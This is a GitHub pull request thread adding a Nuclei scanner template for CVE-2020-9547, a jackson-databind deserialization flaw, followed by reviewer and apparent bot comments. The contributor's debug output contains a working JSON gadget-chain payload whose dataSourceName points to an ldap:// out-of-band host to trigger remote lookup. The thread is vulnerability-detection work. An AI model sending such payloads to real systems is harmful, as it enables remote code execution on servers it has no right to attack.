feat: add CVE-2020-9547 Template

[Pranjal6955]

Template / PR Information

• Added CVE-2020-9547 - FasterXML jackson-databind Deserialization RCE
• References:
  • https://github.com/fairyming/CVE-2020-9547
  • https://nvd.nist.gov/vuln/detail/CVE-2020-9547
  • Block one more gadget type (xbean-reflect/JNDI - CVE-2020-8840) FasterXML/jackson-databind#2620
  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9547

Template Validation

I've validated this template locally?

• YES
• NO

Additional Details (leave it blank if not applicable)

Debug Data (-debug flag output):

# Command used: nuclei -u http://vulnerable-app:8080 -t CVE-2020-9547.yaml -debug

[CVE-2020-9547] Sent HTTP request to http://vulnerable-app:8080/api
POST /api HTTP/1.1
Host: vulnerable-app:8080
Content-Type: application/json
Accept: application/json
Connection: close

{
  "id": 1,
  "@class": "com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig",
  "properties": {
    "@class": "java.util.HashMap",
    "userTransactionName": {
      "@class": "com.sun.rowset.JdbcRowSetImpl",
      "dataSourceName": "ldap://c9a8b2d1e3f4g5h6.interact.sh",
      "autoCommit": true
    }
  }
}

HTTP/1.1 500 Internal Server Error
Content-Type: application/json
Server: Apache-Coyote/1.1
Content-Length: 245

{
  "timestamp": "2024-01-01T12:00:00.000+00:00",
  "status": 500,
  "error": "Internal Server Error",
  "exception": "com.fasterxml.jackson.databind.exc.InvalidTypeIdException",
  "message": "Could not resolve type id 'com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig'"
}

/claim #12488

Additional References:

• Nuclei Template Creation Guideline
• Nuclei Template Matcher Guideline
• Nuclei Template Contribution Guideline
• PD-Community Discord server

[princechaddha]

Automated PR Review (Experimental)

---

Thank you for your contribution! You can join our Discord server. It's a great place to connect with fellow contributors and stay updated with the latest developments. Thank you once again.

Required Fixes

• Fix the template ID to ensure it matches the filename (CVE-2020-9547.yaml).
• Consider refining matchers to ensure coverage without being too broad. For example, ensuring that some matchers target specific JSON structures or fields.

Other Suggestions

• It may be helpful to provide a larger variety of payloads or vary existing ones to cover more scenarios and increase the chances of detection.
• Review the matchers for potential redundancy; multiple matchers returning similar fields may lead to false positives, especially if not tightly coupled to specific cases.
• Ensure that the verified status is confirmed with test data before marking as true; having verification data could provide valuable insights.

I am an AI Template bot, and my feedback is still experimental; the team will review the PR shortly.

[tomaquet18]

Hi @Pranjal6955 ! Just a small heads-up — it looks like you used /claim: #<issue id>, but the correct format should be /claim #<issue id> (without the colon). Otherwise, the bot won't register it properly.

Anyone can still claim it in the meantime, so you might want to fix it quickly 😉

Best regards and happy hacking!

[Pranjal6955]

@tomaquet18 Thanks for helping

[ritikchaddha]

Hello @Pranjal6955, thank you for sharing this template with us. Could you please provide the vulnerable host or Docker setup to validate this template at [email protected]?

[DhiyaneshGeek]

Hi @Pranjal6955

Thanks for sharing the template and contributing to the template project and participating in the Bounty Claim Project 😄

You can grab some cool PD stickers over here http://nux.gg/stickers 😄

You can join our discord server. It's a great place to connect with fellow contributors and stay updated with the latest developments. Thank you once again

Thanks once again !